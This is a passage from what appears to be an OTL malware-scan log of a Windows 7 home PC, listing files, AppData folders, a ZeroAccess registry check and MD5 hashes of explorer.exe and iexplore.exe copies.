[2013/08/05 01:15:08 | 000,066,104 | ---- | C] () -- C:\Windows\SysWow64\bdmpegv.dll
[2013/08/05 01:15:06 | 000,023,080 | ---- | C] () -- C:\Windows\SysWow64\bdmjpeg.dll
[2013/05/05 14:47:47 | 000,000,064 | ---- | C] () -- C:\Windows\GPlrLanc.dat
[2013/04/10 17:49:13 | 000,281,872 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2013/04/10 17:48:50 | 000,076,888 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2013/04/10 17:48:46 | 003,130,440 | ---- | C] () -- C:\Windows\SysWow64\pbsvc_blr.exe
[2012/12/28 16:04:22 | 000,036,352 | ---- | C] () -- C:\Windows\SysWow64\xfcodec.dll
[2012/11/28 15:17:24 | 000,030,568 | ---- | C] () -- C:\Windows\MusiccityDownload.exe
[2012/11/28 15:17:18 | 000,974,848 | ---- | C] () -- C:\Windows\SysWow64\cis-2.4.dll
[2012/11/28 15:17:18 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\issacapi_bs-2.3.dll
[2012/11/28 15:17:18 | 000,065,536 | ---- | C] () -- C:\Windows\SysWow64\issacapi_pe-2.3.dll
[2012/11/28 15:17:18 | 000,057,344 | ---- | C] () -- C:\Windows\SysWow64\issacapi_se-2.3.dll
[2012/10/13 18:19:01 | 003,117,057 | ---- | C] () -- C:\Windows\SysWow64\drivers\EagleNT.sys
[2012/06/25 13:32:04 | 000,004,096 | ---- | C] () -- C:\Windows\d3dx.dat
[2012/05/25 20:58:35 | 000,000,040 | ---- | C] () -- C:\Users\Owner\jagex_cl_runescape_LIVE.dat
[2012/02/02 18:44:17 | 000,002,612 | ---- | C] () -- C:\ProgramData\repository.xml
[2011/12/29 20:39:25 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat
[2011/10/06 20:39:05 | 000,000,632 | RHS- | C] () -- C:\Users\Owner\ntuser.pol
[2011/08/25 03:33:32 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2011/06/08 09:32:58 | 000,001,940 | ---- | C] () -- C:\Users\Owner\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
[2011/02/01 19:26:33 | 000,000,129 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences2.dat
[2011/02/01 19:25:51 | 000,000,034 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences.dat
[2010/12/04 12:41:22 | 230,797,822 | ---- | C] () -- C:\Program Files (x86)\Adobe Flash CS4.rar
[2010/11/06 10:11:27 | 242,254,547 | ---- | C] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar
[2010/08/06 14:55:30 | 000,002,052 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\wklnhst.dat
[2010/06/18 14:13:05 | 000,000,020 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\colthy
[2010/06/08 18:36:58 | 000,025,088 | ---- | C] () -- C:\Users\Owner\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2006/07/15 11:23:29 | 000,502,126 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerv1.18.0 - Trial versionlog.dat
[2005/06/08 01:33:39 | 000,043,850 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat
========== ZeroAccess Check ==========
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 21:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 21:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
========== LOP Check ==========
[2014/03/29 14:57:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ Angry_Birds
[2012/10/21 18:22:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\.minecraft
[2010/04/01 21:48:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\acccore
[2014/04/04 19:11:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\AVG2014
[2012/12/24 13:38:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Azureus
[2012/07/23 13:13:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\BANDISOFT
[2013/11/30 21:20:43 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Charles
[2011/01/01 13:18:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.comcast.callerid.13A1FA90F0FC9DC009FB0956ADD0F13F8608561B.1
[2012/01/28 18:17:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.w3i.FlipToast
[2012/01/28 22:29:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ConsumerSoft
[2014/05/30 04:33:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\dclogs
[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\DriverCure
[2012/02/25 22:40:02 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ExpressFiles
[2013/11/29 20:52:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\eXtremeSenses
[2010/11/11 15:36:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Farm Mania
[2012/09/22 15:14:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\FOG Downloader
[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GameMaker
[2011/09/14 13:57:56 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GetRightToGo
[2011/07/18 08:09:41 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\go
[2014/04/13 11:55:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Gordonsys 2.0
[2013/05/05 14:48:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\InstallX, LLC
[2013/08/04 22:29:55 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\intle®
[2011/08/13 03:29:47 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iTripoli
[2012/05/05 14:41:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iWin
[2012/07/20 12:03:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\join.me
[2014/05/26 01:39:19 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\KSafe
[2013/05/02 13:02:31 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\LaBook
[2010/07/12 18:15:18 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Ludia
[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ManyCam
[2012/03/24 09:02:49 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Moonchild Productions
[2012/02/26 09:37:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Motorola
[2014/05/27 08:08:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\MultiBit
[2011/05/09 20:09:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\My Games
[2010/10/14 08:45:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\NCH Swift Sound
[2013/05/26 19:15:07 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Notepad++
[2013/01/18 13:36:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\npm
[2011/02/26 21:43:09 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Oberon Media
[2012/06/25 13:32:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\onverse
[2013/06/01 22:13:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ooVoo Details
[2013/03/04 18:58:27 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Open Download Manager
[2013/07/24 01:27:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Opera
[2014/05/26 13:17:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Panda Security
[2012/02/02 18:47:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PerformerSoft
[2014/05/18 18:44:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft
[2010/03/29 19:00:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PictureMover
[2010/11/11 15:41:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PlayFirst
[2011/05/08 17:18:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PopCapv1000
[2012/07/01 17:03:46 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Rovio
[2013/08/03 18:57:10 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Screaming Bee
[2012/06/26 11:01:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SecondLife
[2010/04/04 06:12:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Skinux
[2014/05/27 08:08:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Smilebox
[2012/12/26 22:39:32 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Solveig Multimedia
[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software
[2011/05/08 15:09:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpinTop
[2013/01/01 21:26:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SplitMediaLabs
[2014/05/26 13:21:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Spotify
[2013/01/07 20:00:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Strongvault
[2013/12/15 20:07:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Sublime Text 2
[2013/07/29 01:24:29 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SYSTEMAX Software Development
[2014/05/30 09:13:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TeamViewer
[2010/08/06 14:55:35 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Template
[2014/05/26 05:19:38 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TightVNC
[2011/01/14 17:44:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\tmp
[2014/05/22 19:21:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TS3Client
[2014/04/04 19:11:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUp Software
[2014/05/26 05:18:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUpMedia
[2011/02/18 18:50:54 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Unity
[2014/05/30 10:49:39 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\uTorrent
[2010/03/30 18:24:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\WinBatch
========== Purity Check ==========
========== Custom Scans ==========
< %USERPROFILE%\..|smtmp;true;true;true /FP >
< %temp%\smtmp\*.* /s > >
< MD5 for: EXPLORER.ADML >
[2009/07/13 21:30:02 | 000,003,695 | ---- | M] () MD5=7A4C7F3CB156543113596988479CAFCE -- C:\Windows\winsxs\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7ef5713984067904\Explorer.adml
< MD5 for: EXPLORER.ADMX >
[2009/06/10 15:53:55 | 000,003,836 | ---- | M] () MD5=AD131A834808E6AFF4A3918DE05BFCF6 -- C:\Windows\winsxs\amd64_microsoft-windows-shell-grouppolicy_31bf3856ad364e35_6.1.7600.16385_none_71af9b5b0a86e6b7\Explorer.admx
< MD5 for: EXPLORER.EX_ >
[2002/08/29 14:00:00 | 000,351,603 | ---- | M] () MD5=2690171B51B4DBA59C02E89DB7FE6C9B -- C:\Old Computer\EXPLORER.EX_
< MD5 for: EXPLORER.EXE >
[2011/02/26 01:23:14 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=0862495E0C825893DB75EF44FAEA8E93 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_adc24107935a7e25\explorer.exe
[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2009/07/13 20:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe
[2011/02/26 00:51:13 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=255CF508D7CFB10E0794D6AC93280BD8 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_b8ce9756e0b786a4\explorer.exe
[2009/10/31 00:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe
[2011/02/26 00:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=2AF58D15EDC06EC6FDACCE1F19482BBF -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_b816eb59c7bb4020\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\ERDNT\cache86\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010/11/20 07:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2009/08/03 01:19:07 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=700073016DAC1C3D2E7E2CE4223334B6 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_ae84b558ac4eb41c\explorer.exe
[2007/06/13 06:26:03 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=7712DF0CDDE3A5AC89843E61CD5B3658 -- C:\Old Computer\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe
[2009/08/03 00:49:47 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=9FF6C4C91A3711C0A3B18F87B08B518D -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_b8d95faae0af7617\explorer.exe
[2010/11/20 08:24:45 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
[2009/10/31 01:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe
[2009/08/03 00:35:50 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=B95EEB0F4E5EFBF1038A35B3351CF047 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_b853c407c78e3ba9\explorer.exe
[2009/07/13 20:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe
[2009/10/31 01:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe
[2011/02/26 01:26:45 | 002,870,784 | ---- | M] (Microsoft Corporation) MD5=E38899074D4951D31B4040E994DD7C8D -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_ae79ed04ac56c4a9\explorer.exe
[2009/08/03 01:17:37 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=F170B4A061C9E026437B193B4D571799 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_adff19b5932d79ae\explorer.exe
< MD5 for: EXPLORER.EXE.000 >
[2004/08/04 02:56:49 | 001,032,192 | ---- | M] (Microsoft Corporation) MD5=A0732187050030AE399B241436565E64 -- C:\Old Computer\explorer.exe.000
< MD5 for: EXPLORER.EXE.656.DMP >
[2014/05/30 11:02:29 | 002,745,784 | ---- | M] () MD5=9A3402E40E4FD492CC2E321DBC5792B1 -- C:\Users\Owner\AppData\Local\CrashDumps\explorer.exe.656.dmp
< MD5 for: EXPLORER.EXE.MUI >
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\SysWOW64\en-US\explorer.exe.mui
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6c3c2316c1b39396\explorer.exe.mui
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\en-US\explorer.exe.mui
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_61e778c48d52d19b\explorer.exe.mui
< MD5 for: EXPLORER.EXE-02121B1A.PF >
[2009/09/27 22:55:45 | 000,095,436 | ---- | M] () MD5=949311AEFEE9C93B63CEC4B3B2FA976D -- C:\Old Computer\EXPLORER.EXE-02121B1A.pf
< MD5 for: EXPLORER.EXE-7A3328DA.PF >
[2014/05/30 10:30:34 | 000,271,726 | ---- | M] () MD5=177EC97170AD80FDE1C3CAD39CBA149E -- C:\Windows\Prefetch\EXPLORER.EXE-7A3328DA.pf
< MD5 for: EXPLORER.SC_ >
[2002/08/29 14:00:00 | 000,000,181 | ---- | M] () MD5=BC5B38879C56DFBC05C8B5C43AC4D739 -- C:\Old Computer\EXPLORER.SC_
< MD5 for: EXPLORER.SCF >
[2002/08/29 07:00:00 | 000,000,080 | ---- | M] () MD5=A3975A7D2C98B30A2AE010754FFB9392 -- C:\Old Computer\explorer.scf
< MD5 for: IEXPLORE.CH_ >
[2002/08/29 14:00:00 | 000,161,725 | ---- | M] () MD5=D94018D849BDF25E7ADB8CD46DA3DC7F -- C:\Old Computer\IEXPLORE.CH_
< MD5 for: IEXPLORE.CHM >
[2004/07/17 13:40:16 | 000,204,810 | ---- | M] () MD5=60858526AAD1CC55F5F0055B8E3B66FE -- C:\Old Computer\iexplore.chm
< MD5 for: IEXPLORE.EX_ >
[2002/08/29 14:00:00 | 000,036,925 | ---- | M] () MD5=BAC737FDAA9B648A6EBFF76BFAEC7501 -- C:\Old Computer\IEXPLORE.EX_
< MD5 for: IEXPLORE.EXE >
[2012/06/02 06:47:54 | 000,754,808 | ---- | M] (Microsoft Corporation) MD5=004640AB259C1572EBD5FB0A32F63686 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.20553_none_0dbfc836999db0ca\iexplore.exe
[2013/01/08 20:53:45 | 000,763,424 | ---- | M] (Microsoft Corporation) MD5=0100BCF23941C83462E4A70F94C3392E -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16464_none_0d2c5bc980874648\iexplore.exe
[2012/05/17 18:21:54 | 000,748,664 | ---- | M] (Microsoft Corporation) MD5=0129BB16161C2FD9A6B19111AB047198 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16446_none_1798a687b4d6030f\iexplore.exe
[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe
[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.17041_none_858ffb5bf711c81f\iexplore.exe
[2013/11/20 04:04:34 | 000,804,560 | ---- | M] (Microsoft Corporation) MD5=0685765C0CBE095BA0C6C8790BAE21EF -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.16428_none_7b0d6f67c2d3f97a\iexplore.exe
[2012/11/13 21:56:04 | 000,757,296 | ---- | M] (Microsoft Corporation) MD5=0D286C0FE561D1A7EB30E83A0FF305B2 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16457_none_178ed6e5b4dd3857\iexplore.exe
[2011/02/10 22:14:09 | 000,751,928 | ---- | M] (Microsoft Corporation) MD5=10CE0D4FFE2630C84E60993E79466A51 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.2.8080.16413_none_a5a627fe91359e4a\iexplore.exe
[2012/06/29 00:02:52 | 000,754,784 | ---- | M] (Microsoft Corporation) MD5=1223ACBFC1093852DFF039E189599BBD -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16448_none_0d45fcc9807373c2\iexplore.exe
[2013/07/26 01:23:39 | 000,775,256 | ---- | M] (Microsoft Corporation) MD5=133CEF30905806A35606652D409EEEBA -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_10.2.9200.16660_none_16893df21e3dcd43\iexplore.exe
[2013/05/16 23:10:41 | 000,763,544 | ---- | M] (Microsoft Corporation) MD5=1423FF1BFD2ECD9CFC8C17EA4F98B20F -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16490_none_0d07eadd80a334bf\iexplore.exe
[2013/08/10 01:31:28 | 000,775,256 | ---- | M] (Microsoft Corporation) MD5=1F3B062444AD6F667B5336E78D5A02B7 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_10.2.9200.20794_none_ffb36d2837eafb72\iexplore.exe
[2012/08/24 02:34:41 | 000,748,680 | ---- | M] (Microsoft Corporation) MD5=22CC6CDBA678790046693654C3B212E4 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16450_none_1787d4dfb4e386f6\iexplore.exe
[2013/02/22 02:04:50 | 000,763,520 | ---- | M] (Microsoft Corporation) MD5=25B53709A37C3FD814B68EA0A92D18F9 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16476_none_0d238c71808d94e7\iexplore.exe
[2012/05/17 17:59:46 | 000,748,664 | ---- | M] (Microsoft Corporation) MD5=268982F1FD671A077C6A2AF41E351436 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.20551_none_181271f4ce004017\iexplore.exe
[2012/10/08 03:37:24 | 000,748,704 | ---- | M] (Microsoft Corporation) MD5=270A1342BD5AF95CA25A586B4C2F1522 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16455_none_178cd651b4df05a9\iexplore.exe
[2013/06/11 23:41:27 | 000,770,648 | ---- | M] (Microsoft Corporation) MD5=2A5F565327BFD679EC5F790DC15BBF25 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_10.2.9200.20742_none_0a0343986c500b78\iexplore.exe
[2009/07/13 20:17:29 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=2C32E3E596CFE660353753EABEFB0540 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16385_none_19ba3f8a72d988f3\iexplore.exe
[2012/08/24 06:23:44 | 000,754,824 | ---- | M] (Microsoft Corporation) MD5=2D53C5F71653EF94E7829846405D4ED2 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16450_none_0d332a8d8082c4fb\iexplore.exe
[2013/06/11 19:23:57 | 000,770,648 | ---- | M] (Microsoft Corporation) MD5=30E7CA4620500FE012EB464F0E1DE91E -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_10.2.9200.16635_none_20da757e52a1c35e\iexplore.exe
[2013/02/21 23:10:00 | 000,757,376 | ---- | M] (Microsoft Corporation) MD5=32732CEDE2A1106B736EF3D84054EE04 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16476_none_177836c3b4ee56e2\iexplore.exe
